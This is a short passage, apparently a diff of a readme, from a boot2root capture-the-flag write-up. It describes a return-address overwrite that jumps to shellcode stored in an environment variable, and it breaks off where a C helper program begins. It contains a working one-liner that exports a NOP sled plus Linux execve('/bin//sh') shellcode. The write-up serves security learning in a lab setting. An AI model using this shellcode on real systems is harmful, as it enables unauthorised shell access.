mirsella/boot2root/writeup3_bonus/readme.md

 we will put a shellcode (assembly instructions in hex format, the kind used by any program when loaded in memory) in a environment variable, and redirect the main's return address to the environment variable's address.

 shellcode found on https://axcheron.github.io/linux-shellcode-101-from-hell-to-shell/.

 `export code=$(python -c "print('\x90'*8 + '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80')")`

-a simple C program to get the address of the environment variable:
+and simple C program to get the address of the environment variable:

 ```c
 #include <stdio.h>